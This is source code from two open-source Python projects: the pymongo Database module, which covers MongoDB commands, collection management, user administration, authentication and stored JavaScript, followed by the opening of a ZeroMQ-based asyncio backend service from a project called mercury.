# --- initNirvana/Easyphotos :: env/lib/python3.4/site-packages/pymongo/database.py (license: MIT) ---
# Copyright 2009-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Database level operations."""
import warnings
from bson.binary import OLD_UUID_SUBTYPE
from bson.code import Code
from bson.dbref import DBRef
from bson.son import SON
from pymongo import auth, common, helpers
from pymongo.collection import Collection
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (CollectionInvalid,
ConfigurationError,
OperationFailure)
from pymongo.read_preferences import (modes,
secondary_ok_commands,
ReadPreference)
from pymongo.son_manipulator import SONManipulator
class Database(common.BaseObject):
"""A Mongo database.
"""
def __init__(self, connection, name):
"""Get a database by connection and name.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
database name.
:Parameters:
- `connection`: a client instance
- `name`: database name
.. mongodoc:: databases
"""
super(Database,
self).__init__(slave_okay=connection.slave_okay,
read_preference=connection.read_preference,
tag_sets=connection.tag_sets,
secondary_acceptable_latency_ms=(
connection.secondary_acceptable_latency_ms),
safe=connection.safe,
uuidrepresentation=connection.uuid_subtype,
**connection.write_concern)
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if name != '$external':
helpers._check_database_name(name)
self.__name = str(name)
self.__connection = connection
self.__incoming_manipulators = []
self.__incoming_copying_manipulators = []
self.__outgoing_manipulators = []
self.__outgoing_copying_manipulators = []
def add_son_manipulator(self, manipulator):
"""Add a new son manipulator to this database.
Newly added manipulators will be applied before existing ones.
:Parameters:
- `manipulator`: the manipulator to add
"""
base = SONManipulator()
def method_overwritten(instance, method):
return (getattr(
instance, method).__func__ != getattr(base, method).__func__)
if manipulator.will_copy():
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_copying_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_copying_manipulators.insert(0, manipulator)
else:
if method_overwritten(manipulator, "transform_incoming"):
self.__incoming_manipulators.insert(0, manipulator)
if method_overwritten(manipulator, "transform_outgoing"):
self.__outgoing_manipulators.insert(0, manipulator)
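    # A hedged sketch of a custom manipulator; the class and field names are
    # hypothetical, but the transform_incoming signature matches the calls
    # made by _apply_incoming_manipulators below:
    #
    #     class StampManipulator(SONManipulator):
    #         def transform_incoming(self, son, collection):
    #             son["added_by"] = "app"  # stamp documents on their way in
    #             return son
    #
    #     db.add_son_manipulator(StampManipulator())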
@property
def system_js(self):
"""A :class:`SystemJS` helper for this :class:`Database`.
See the documentation for :class:`SystemJS` for more details.
.. versionadded:: 1.5
"""
return SystemJS(self)
@property
def connection(self):
"""The client instance for this :class:`Database`.
.. versionchanged:: 1.3
``connection`` is now a property rather than a method.
"""
return self.__connection
@property
def name(self):
"""The name of this :class:`Database`.
.. versionchanged:: 1.3
``name`` is now a property rather than a method.
"""
return self.__name
@property
def incoming_manipulators(self):
"""List all incoming SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_manipulators]
@property
def incoming_copying_manipulators(self):
"""List all incoming SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_copying_manipulators]
@property
def outgoing_manipulators(self):
"""List all outgoing SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_manipulators]
@property
def outgoing_copying_manipulators(self):
"""List all outgoing SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_copying_manipulators]
def __eq__(self, other):
if isinstance(other, Database):
us = (self.__connection, self.__name)
them = (other.__connection, other.__name)
return us == them
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Database(%r, %r)" % (self.__connection, self.__name)
def __getattr__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return Collection(self, name)
def __getitem__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return self.__getattr__(name)
def create_collection(self, name, **kwargs):
"""Create a new :class:`~pymongo.collection.Collection` in this
database.
Normally collection creation is automatic. This method should
only be used to specify options on
creation. :class:`~pymongo.errors.CollectionInvalid` will be
raised if the collection already exists.
Options should be passed as keyword arguments to this method. Supported
options vary with MongoDB release. Some examples include:
- "size": desired initial size for the collection (in
bytes). For capped collections this size is the max
size of the collection.
- "capped": if True, this is a capped collection
- "max": maximum number of objects if capped (optional)
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `name`: the name of the collection to create
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionchanged:: 1.5
deprecating `options` in favor of kwargs
"""
opts = {"create": True}
opts.update(kwargs)
if name in self.collection_names():
raise CollectionInvalid("collection %s already exists" % name)
return Collection(self, name, **opts)
def _apply_incoming_manipulators(self, son, collection):
for manipulator in self.__incoming_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _apply_incoming_copying_manipulators(self, son, collection):
for manipulator in self.__incoming_copying_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _fix_incoming(self, son, collection):
"""Apply manipulators to an incoming SON object before it gets stored.
:Parameters:
- `son`: the son object going into the database
- `collection`: the collection the son object is being saved in
"""
son = self._apply_incoming_manipulators(son, collection)
son = self._apply_incoming_copying_manipulators(son, collection)
return son
def _fix_outgoing(self, son, collection):
"""Apply manipulators to a SON object as it comes out of the database.
:Parameters:
- `son`: the son object coming out of the database
- `collection`: the collection the son object was saved in
"""
for manipulator in reversed(self.__outgoing_manipulators):
son = manipulator.transform_outgoing(son, collection)
for manipulator in reversed(self.__outgoing_copying_manipulators):
son = manipulator.transform_outgoing(son, collection)
return son
def _command(self, command, value=1,
check=True, allowable_errors=None,
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Internal command helper.
"""
if isinstance(command, str):
command = SON([(command, value)])
command_name = list(command.keys())[0].lower()
must_use_master = kwargs.pop('_use_master', False)
if command_name not in secondary_ok_commands:
must_use_master = True
# Special-case: mapreduce can go to secondaries only if inline
if command_name == 'mapreduce':
out = command.get('out') or kwargs.get('out')
if not isinstance(out, dict) or not out.get('inline'):
must_use_master = True
# Special-case: aggregate with $out cannot go to secondaries.
if command_name == 'aggregate':
for stage in kwargs.get('pipeline', []):
if '$out' in stage:
must_use_master = True
break
extra_opts = {
'as_class': kwargs.pop('as_class', None),
'slave_okay': kwargs.pop('slave_okay', self.slave_okay),
'_must_use_master': must_use_master,
'_uuid_subtype': uuid_subtype
}
extra_opts['read_preference'] = kwargs.pop(
'read_preference',
self.read_preference)
extra_opts['tag_sets'] = kwargs.pop(
'tag_sets',
self.tag_sets)
extra_opts['secondary_acceptable_latency_ms'] = kwargs.pop(
'secondary_acceptable_latency_ms',
self.secondary_acceptable_latency_ms)
extra_opts['compile_re'] = compile_re
fields = kwargs.get('fields')
if fields is not None and not isinstance(fields, dict):
kwargs['fields'] = helpers._fields_list_to_dict(fields)
command.update(kwargs)
# Warn if must_use_master will override read_preference.
if (extra_opts['read_preference'] != ReadPreference.PRIMARY and
extra_opts['_must_use_master']):
warnings.warn("%s does not support %s read preference "
"and will be routed to the primary instead." %
(command_name,
modes[extra_opts['read_preference']]),
UserWarning, stacklevel=3)
cursor = self["$cmd"].find(command, **extra_opts).limit(-1)
for doc in cursor:
result = doc
if check:
msg = "command %s on namespace %s failed: %%s" % (
repr(command).replace("%", "%%"), self.name + '.$cmd')
helpers._check_command_response(result, self.connection.disconnect,
msg, allowable_errors)
return result, cursor.conn_id
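    # For example, a hypothetical mapreduce whose "out" is not inline is forced
    # to the primary and a UserWarning is emitted, even when a secondary read
    # preference was requested (mapf and reducef are placeholder functions):
    #
    #     db.command(SON([("mapreduce", "coll"), ("map", mapf),
    #                     ("reduce", reducef), ("out", "results")]),
    #                read_preference=ReadPreference.SECONDARY)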
def command(self, command, value=1,
                check=True, allowable_errors=None,
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Issue a MongoDB command.
Send command `command` to the database and return the
response. If `command` is an instance of :class:`basestring`
(:class:`str` in python 3) then the command {`command`: `value`}
will be sent. Otherwise, `command` must be an instance of
:class:`dict` and will be sent as is.
Any additional keyword arguments will be added to the final
command document before it is sent.
For example, a command like ``{buildinfo: 1}`` can be sent
using:
>>> db.command("buildinfo")
For a command where the value matters, like ``{collstats:
collection_name}`` we can do:
>>> db.command("collstats", collection_name)
For commands that take additional arguments we can use
kwargs. So ``{filemd5: object_id, root: file_root}`` becomes:
>>> db.command("filemd5", object_id, root=file_root)
:Parameters:
- `command`: document representing the command to be issued,
or the name of the command (for simple commands only).
.. note:: the order of keys in the `command` document is
significant (the "verb" must come first), so commands
which require multiple keys (e.g. `findandmodify`)
should use an instance of :class:`~bson.son.SON` or
a string and kwargs instead of a Python `dict`.
- `value` (optional): value to use for the command verb when
`command` is passed as a string
- `check` (optional): check the response for errors, raising
:class:`~pymongo.errors.OperationFailure` if there are any
- `allowable_errors`: if `check` is ``True``, error messages
in this list will be ignored by error-checking
- `uuid_subtype` (optional): The BSON binary subtype to use
for a UUID used in this command.
- `compile_re` (optional): if ``False``, don't attempt to compile
BSON regular expressions into Python regular expressions. Return
instances of :class:`~bson.regex.Regex` instead. Can avoid
:exc:`~bson.errors.InvalidBSON` errors when receiving
Python-incompatible regular expressions, for example from
``currentOp``
- `read_preference`: The read preference for this connection.
See :class:`~pymongo.read_preferences.ReadPreference` for available
options.
- `tag_sets`: Read from replica-set members with these tags.
To specify a priority-order for tag sets, provide a list of
tag sets: ``[{'dc': 'ny'}, {'dc': 'la'}, {}]``. A final, empty tag
set, ``{}``, means "read from any member that matches the mode,
ignoring tags." ReplicaSetConnection tries each set of tags in turn
until it finds a set of tags with at least one matching member.
- `secondary_acceptable_latency_ms`: Any replica-set member whose
ping time is within secondary_acceptable_latency_ms of the nearest
member may accept reads. Default 15 milliseconds.
**Ignored by mongos** and must be configured on the command line.
See the localThreshold_ option for more information.
- `**kwargs` (optional): additional keyword arguments will
be added to the command document before it is sent
.. note:: ``command`` ignores the ``network_timeout`` parameter.
.. versionchanged:: 2.7
Added ``compile_re`` option.
.. versionchanged:: 2.3
Added `tag_sets` and `secondary_acceptable_latency_ms` options.
.. versionchanged:: 2.2
Added support for `as_class` - the class you want to use for
the resulting documents
.. versionchanged:: 1.6
Added the `value` argument for string commands, and keyword
arguments for additional command options.
.. versionchanged:: 1.5
`command` can be a string in addition to a full document.
.. versionadded:: 1.4
.. mongodoc:: commands
.. _localThreshold: http://docs.mongodb.org/manual/reference/mongos/#cmdoption-mongos--localThreshold
"""
return self._command(command, value, check, allowable_errors,
uuid_subtype, compile_re, **kwargs)[0]
def collection_names(self, include_system_collections=True):
"""Get a list of all the collection names in this database.
:Parameters:
- `include_system_collections` (optional): if ``False`` list
will not include system collections (e.g ``system.indexes``)
"""
client = self.connection
client._ensure_connected(True)
if client.max_wire_version > 2:
res, addr = self._command("listCollections",
cursor={},
read_preference=ReadPreference.PRIMARY)
# MongoDB 2.8rc2
if "collections" in res:
results = res["collections"]
# >= MongoDB 2.8rc3
else:
results = CommandCursor(self["$cmd"], res["cursor"], addr)
names = [result["name"] for result in results]
else:
names = [result["name"] for result
in self["system.namespaces"].find(_must_use_master=True)]
names = [n[len(self.__name) + 1:] for n in names
if n.startswith(self.__name + ".") and "$" not in n]
if not include_system_collections:
names = [n for n in names if not n.startswith("system.")]
return names
def drop_collection(self, name_or_collection):
"""Drop a collection.
:Parameters:
- `name_or_collection`: the name of a collection to drop or the
collection object itself
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
self.__connection._purge_index(self.__name, name)
self.command("drop", str(name), allowable_errors=["ns not found"],
read_preference=ReadPreference.PRIMARY)
def validate_collection(self, name_or_collection,
scandata=False, full=False):
"""Validate a collection.
Returns a dict of validation info. Raises CollectionInvalid if
validation fails.
With MongoDB < 1.9 the result dict will include a `result` key
with a string value that represents the validation results. With
MongoDB >= 1.9 the `result` key no longer exists and the results
are split into individual fields in the result dict.
:Parameters:
- `name_or_collection`: A Collection object or the name of a
collection to validate.
- `scandata`: Do extra checks beyond checking the overall
structure of the collection.
- `full`: Have the server do a more thorough scan of the
collection. Use with `scandata` for a thorough scan
of the structure of the collection and the individual
documents. Ignored in MongoDB versions before 1.9.
.. versionchanged:: 1.11
validate_collection previously returned a string.
.. versionadded:: 1.11
Added `scandata` and `full` options.
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
result = self.command("validate", str(name),
scandata=scandata, full=full,
read_preference=ReadPreference.PRIMARY)
valid = True
# Pre 1.9 results
if "result" in result:
info = result["result"]
if info.find("exception") != -1 or info.find("corrupt") != -1:
raise CollectionInvalid("%s invalid: %s" % (name, info))
# Sharded results
elif "raw" in result:
for _, res in result["raw"].items():
if "result" in res:
info = res["result"]
if (info.find("exception") != -1 or
info.find("corrupt") != -1):
raise CollectionInvalid("%s invalid: "
"%s" % (name, info))
elif not res.get("valid", False):
valid = False
break
# Post 1.9 non-sharded results.
elif not result.get("valid", False):
valid = False
if not valid:
raise CollectionInvalid("%s invalid: %r" % (name, result))
return result
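    # Hypothetical call: returns the raw validation document, or raises
    # CollectionInvalid if the server reports corruption:
    #
    #     stats = db.validate_collection("users", scandata=True, full=True)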
def current_op(self, include_all=False):
"""Get information on operations currently running.
:Parameters:
- `include_all` (optional): if ``True`` also list currently
idle operations in the result
"""
if include_all:
return self['$cmd.sys.inprog'].find_one({"$all": True})
else:
return self['$cmd.sys.inprog'].find_one()
def profiling_level(self):
"""Get the database's current profiling level.
Returns one of (:data:`~pymongo.OFF`,
:data:`~pymongo.SLOW_ONLY`, :data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
result = self.command("profile", -1,
read_preference=ReadPreference.PRIMARY)
assert result["was"] >= 0 and result["was"] <= 2
return result["was"]
def set_profiling_level(self, level, slow_ms=None):
"""Set the database's profiling level.
:Parameters:
- `level`: Specifies a profiling level, see list of possible values
below.
- `slow_ms`: Optionally modify the threshold for the profile to
consider a query or operation. Even if the profiler is off queries
slower than the `slow_ms` level will get written to the logs.
Possible `level` values:
+----------------------------+------------------------------------+
| Level | Setting |
+============================+====================================+
| :data:`~pymongo.OFF` | Off. No profiling. |
+----------------------------+------------------------------------+
| :data:`~pymongo.SLOW_ONLY` | On. Only includes slow operations. |
+----------------------------+------------------------------------+
| :data:`~pymongo.ALL` | On. Includes all operations. |
+----------------------------+------------------------------------+
Raises :class:`ValueError` if level is not one of
(:data:`~pymongo.OFF`, :data:`~pymongo.SLOW_ONLY`,
:data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
if not isinstance(level, int) or level < 0 or level > 2:
raise ValueError("level must be one of (OFF, SLOW_ONLY, ALL)")
if slow_ms is not None and not isinstance(slow_ms, int):
raise TypeError("slow_ms must be an integer")
if slow_ms is not None:
self.command("profile", level, slowms=slow_ms,
read_preference=ReadPreference.PRIMARY)
else:
self.command("profile", level,
read_preference=ReadPreference.PRIMARY)
def profiling_info(self):
"""Returns a list containing current profiling information.
.. mongodoc:: profiling
"""
return list(self["system.profile"].find())
def error(self):
"""**DEPRECATED**: Get the error if one occurred on the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Return None if the last operation was error-free. Otherwise return the
error that occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("Database.error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
error_msg = error.get("err", "")
if error_msg is None:
return None
if error_msg.startswith("not master"):
self.__connection.disconnect()
return error
def last_status(self):
"""**DEPRECATED**: Get status information from the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Returns a SON object with status information.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("last_status() is deprecated",
DeprecationWarning, stacklevel=2)
return self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
def previous_error(self):
"""**DEPRECATED**: Get the most recent error on this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``getpreverror`` will be removed in a future MongoDB release.
Only returns errors that have occurred since the last call to
:meth:`reset_error_history`. Returns None if no such errors have
occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("previous_error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getpreverror",
read_preference=ReadPreference.PRIMARY)
if error.get("err", 0) is None:
return None
return error
def reset_error_history(self):
"""**DEPRECATED**: Reset the error history of this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``reseterror`` will be removed in a future MongoDB release.
Calls to :meth:`previous_error` will only return errors that have
occurred since the most recent call to this method.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("reset_error_history() is deprecated",
DeprecationWarning, stacklevel=2)
self.command("reseterror",
read_preference=ReadPreference.PRIMARY)
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Database' object is not iterable")
def _default_role(self, read_only):
if self.name == "admin":
if read_only:
return "readAnyDatabase"
else:
return "root"
else:
if read_only:
return "read"
else:
return "dbOwner"
def _create_or_update_user(
self, create, name, password, read_only, **kwargs):
"""Use a command to create (if create=True) or modify a user.
"""
opts = {}
if read_only or (create and "roles" not in kwargs):
warnings.warn("Creating a user with the read_only option "
"or without roles is deprecated in MongoDB "
">= 2.6", DeprecationWarning)
opts["roles"] = [self._default_role(read_only)]
elif read_only:
warnings.warn("The read_only option is deprecated in MongoDB "
">= 2.6, use 'roles' instead", DeprecationWarning)
if password is not None:
# We always salt and hash client side.
if "digestPassword" in kwargs:
raise ConfigurationError("The digestPassword option is not "
"supported via add_user. Please use "
"db.command('createUser', ...) "
"instead for this option.")
opts["pwd"] = auth._password_digest(name, password)
opts["digestPassword"] = False
opts["writeConcern"] = self._get_wc_override() or self.write_concern
opts.update(kwargs)
if create:
command_name = "createUser"
else:
command_name = "updateUser"
self.command(command_name, name,
read_preference=ReadPreference.PRIMARY, **opts)
def _legacy_add_user(self, name, password, read_only, **kwargs):
"""Uses v1 system to add users, i.e. saving to system.users.
"""
user = self.system.users.find_one({"user": name}) or {"user": name}
if password is not None:
user["pwd"] = auth._password_digest(name, password)
if read_only is not None:
user["readOnly"] = read_only
user.update(kwargs)
try:
self.system.users.save(user, **self._get_wc_override())
except OperationFailure as exc:
# First admin user add fails gle in MongoDB >= 2.1.2
# See SERVER-4225 for more information.
if 'login' in str(exc):
pass
# First admin user add fails gle from mongos 2.0.x
# and 2.2.x.
elif (exc.details and
'getlasterror' in exc.details.get('note', '')):
pass
else:
raise
def add_user(self, name, password=None, read_only=None, **kwargs):
"""Create user `name` with password `password`.
Add a new user with permissions for this :class:`Database`.
.. note:: Will change the password if user `name` already exists.
:Parameters:
- `name`: the name of the user to create
- `password` (optional): the password of the user to create. Can not
be used with the ``userSource`` argument.
- `read_only` (optional): if ``True`` the user will be read only
- `**kwargs` (optional): optional fields for the user document
(e.g. ``userSource``, ``otherDBRoles``, or ``roles``). See
`<http://docs.mongodb.org/manual/reference/privilege-documents>`_
for more information.
.. note:: The use of optional keyword arguments like ``userSource``,
``otherDBRoles``, or ``roles`` requires MongoDB >= 2.4.0
.. versionchanged:: 2.5
Added kwargs support for optional fields introduced in MongoDB 2.4
.. versionchanged:: 2.2
Added support for read only users
.. versionadded:: 1.4
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None:
if not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s or None" % (str.__name__,))
if len(password) == 0:
raise ValueError("password can't be empty")
if read_only is not None:
read_only = common.validate_boolean('read_only', read_only)
if 'roles' in kwargs:
raise ConfigurationError("Can not use "
"read_only and roles together")
try:
uinfo = self.command("usersInfo", name,
read_preference=ReadPreference.PRIMARY)
self._create_or_update_user(
(not uinfo["users"]), name, password, read_only, **kwargs)
except OperationFailure as exc:
# MongoDB >= 2.5.3 requires the use of commands to manage
# users.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self._legacy_add_user(name, password, read_only, **kwargs)
# Unauthorized. MongoDB >= 2.7.1 has a narrow localhost exception,
# and we must add a user before sending commands.
elif exc.code == 13:
self._create_or_update_user(
True, name, password, read_only, **kwargs)
else:
raise
def remove_user(self, name):
"""Remove user `name` from this :class:`Database`.
User `name` will no longer have permissions to access this
:class:`Database`.
:Parameters:
- `name`: the name of the user to remove
.. versionadded:: 1.4
"""
try:
write_concern = self._get_wc_override() or self.write_concern
self.command("dropUser", name,
read_preference=ReadPreference.PRIMARY,
writeConcern=write_concern)
except OperationFailure as exc:
# See comment in add_user try / except above.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self.system.users.remove({"user": name},
**self._get_wc_override())
return
raise
def authenticate(self, name, password=None,
source=None, mechanism='DEFAULT', **kwargs):
"""Authenticate to use this database.
Authentication lasts for the life of the underlying client
instance, or until :meth:`logout` is called.
Raises :class:`TypeError` if (required) `name`, (optional) `password`,
or (optional) `source` is not an instance of :class:`basestring`
(:class:`str` in python 3).
.. note::
- This method authenticates the current connection, and
will also cause all new :class:`~socket.socket` connections
in the underlying client instance to be authenticated automatically.
- Authenticating more than once on the same database with different
credentials is not supported. You must call :meth:`logout` before
authenticating with new credentials.
- When sharing a client instance between multiple threads, all
threads will share the authentication. If you need different
authentication profiles for different purposes you must use
distinct client instances.
- To get authentication to apply immediately to all
existing sockets you may need to reset this client instance's
sockets using :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
:Parameters:
- `name`: the name of the user to authenticate.
- `password` (optional): the password of the user to authenticate.
Not used with GSSAPI or MONGODB-X509 authentication.
- `source` (optional): the database to authenticate on. If not
specified the current database is used.
- `mechanism` (optional): See
:data:`~pymongo.auth.MECHANISMS` for options.
By default, use SCRAM-SHA-1 with MongoDB 3.0 and later,
MONGODB-CR (MongoDB Challenge Response protocol) for older servers.
- `gssapiServiceName` (optional): Used with the GSSAPI mechanism
to specify the service name portion of the service principal name.
Defaults to 'mongodb'.
.. versionadded:: 2.8
Use SCRAM-SHA-1 with MongoDB 3.0 and later.
.. versionchanged:: 2.5
Added the `source` and `mechanism` parameters. :meth:`authenticate`
now raises a subclass of :class:`~pymongo.errors.PyMongoError` if
authentication fails due to invalid credentials or configuration
issues.
.. mongodoc:: authenticate
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None and not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s" % (str.__name__,))
if source is not None and not isinstance(source, str):
raise TypeError("source must be an instance "
"of %s" % (str.__name__,))
common.validate_auth_mechanism('mechanism', mechanism)
validated_options = {}
for option, value in kwargs.items():
normalized, val = common.validate_auth_option(option, value)
validated_options[normalized] = val
credentials = auth._build_credentials_tuple(mechanism,
source or self.name, name,
password, validated_options)
self.connection._cache_credentials(self.name, credentials)
return True
def logout(self):
"""Deauthorize use of this database for this client instance.
.. note:: Other databases may still be authenticated, and other
existing :class:`~socket.socket` connections may remain
authenticated for this database unless you reset all sockets
with :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
"""
# Sockets will be deauthenticated as they are used.
self.connection._purge_credentials(self.name)
def dereference(self, dbref, **kwargs):
"""Dereference a :class:`~bson.dbref.DBRef`, getting the
document it points to.
Raises :class:`TypeError` if `dbref` is not an instance of
:class:`~bson.dbref.DBRef`. Returns a document, or ``None`` if
the reference does not point to a valid document. Raises
:class:`ValueError` if `dbref` has a database specified that
is different from the current database.
:Parameters:
- `dbref`: the reference
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to
:meth:`~pymongo.collection.Collection.find`.
"""
if not isinstance(dbref, DBRef):
raise TypeError("cannot dereference a %s" % type(dbref))
if dbref.database is not None and dbref.database != self.__name:
raise ValueError("trying to dereference a DBRef that points to "
"another database (%r not %r)" % (dbref.database,
self.__name))
return self[dbref.collection].find_one({"_id": dbref.id}, **kwargs)
def eval(self, code, *args):
"""Evaluate a JavaScript expression in MongoDB.
Useful if you need to touch a lot of data lightly; in such a
scenario the network transfer of the data could be a
bottleneck. The `code` argument must be a JavaScript
function. Additional positional arguments will be passed to
that function when it is run on the server.
Raises :class:`TypeError` if `code` is not an instance of
:class:`basestring` (:class:`str` in python 3) or `Code`.
Raises :class:`~pymongo.errors.OperationFailure` if the eval
fails. Returns the result of the evaluation.
:Parameters:
- `code`: string representation of JavaScript code to be
evaluated
- `args` (optional): additional positional arguments are
passed to the `code` being evaluated
"""
if not isinstance(code, Code):
code = Code(code)
result = self.command("$eval", code,
read_preference=ReadPreference.PRIMARY,
args=args)
return result.get("retval", None)
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
raise TypeError("'Database' object is not callable. If you meant to "
"call the '%s' method on a '%s' object it is "
"failing because no such method exists." % (
self.__name, self.__connection.__class__.__name__))
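# A minimal usage sketch for the class above, assuming a reachable mongod on
# the default port; the database name is hypothetical:
#
#     from pymongo import MongoClient
#     client = MongoClient("localhost", 27017)
#     db = client["app_db"]                    # a Database via __getitem__
#     db.command("buildinfo")                  # simple command form
#     db.collection_names(include_system_collections=False)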
class SystemJS(object):
"""Helper class for dealing with stored JavaScript.
"""
def __init__(self, database):
"""Get a system js helper for the database `database`.
An instance of :class:`SystemJS` can be created with an instance
of :class:`Database` through :attr:`Database.system_js`,
manual instantiation of this class should not be necessary.
:class:`SystemJS` instances allow for easy manipulation and
access to server-side JavaScript:
.. doctest::
>>> db.system_js.add1 = "function (x) { return x + 1; }"
>>> db.system.js.find({"_id": "add1"}).count()
1
>>> db.system_js.add1(5)
6.0
>>> del db.system_js.add1
>>> db.system.js.find({"_id": "add1"}).count()
0
.. note:: Requires server version **>= 1.1.1**
.. versionadded:: 1.5
"""
# can't just assign it since we've overridden __setattr__
object.__setattr__(self, "_db", database)
def __setattr__(self, name, code):
self._db.system.js.save({"_id": name, "value": Code(code)},
**self._db._get_wc_override())
def __setitem__(self, name, code):
self.__setattr__(name, code)
def __delattr__(self, name):
self._db.system.js.remove({"_id": name}, **self._db._get_wc_override())
def __delitem__(self, name):
self.__delattr__(name)
def __getattr__(self, name):
return lambda *args: self._db.eval(Code("function() { "
"return this[name].apply("
"this, arguments); }",
scope={'name': name}), *args)
def __getitem__(self, name):
return self.__getattr__(name)
def list(self):
"""Get a list of the names of the functions stored in this database.
.. versionadded:: 1.9
"""
return [x["_id"] for x in self._db.system.js.find(fields=["_id"])]
# --- jr0d/mercury :: src/mercury/backend/service.py (license: Apache-2.0) ---
# Copyright 2015 Jared Rodriguez ([email protected])
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
import zmq
import zmq.asyncio
from mercury.common.asyncio.dispatcher import AsyncDispatcher
from mercury.common.asyncio.transport import TrivialAsyncRouterReqService
from mercury.common.asyncio.clients.inventory import \
InventoryClient as AsyncInventoryClient
from mercury.common.clients.inventory import InventoryClient
from mercury.backend.active_asyncio import add_active_record, ping_loop, \
stop_ping
from mercury.backend.controller import BackendController
from mercury.backend.options import parse_options
from mercury.backend.rpc_client import AsyncRPCClient
log = logging.getLogger(__name__)
class BackEndService(TrivialAsyncRouterReqService):
def __init__(self,
bind_address,
inventory_client,
rpc_client,
name,
datacenter,
vip,
port):
super(BackEndService, self).__init__(bind_address)
self.inventory_client = inventory_client
self.rpc_client = rpc_client
self.server_info = {
'name': name,
'datacenter': datacenter,
'address': vip,
'port': port
}
self.controller = BackendController(self.server_info,
self.inventory_client,
self.rpc_client)
self.dispatcher = AsyncDispatcher(self.controller)
async def process(self, message):
""" Process the message via dispatcher """
return await self.dispatcher.dispatch(message)
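    # A hedged sketch of the round trip; the message schema below is an
    # assumption inferred from the dispatcher convention, not confirmed by
    # this module:
    #
    #     {"endpoint": "register", "args": [...], "kwargs": {...}}
    #
    # AsyncDispatcher resolves the endpoint on BackendController and awaits it.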
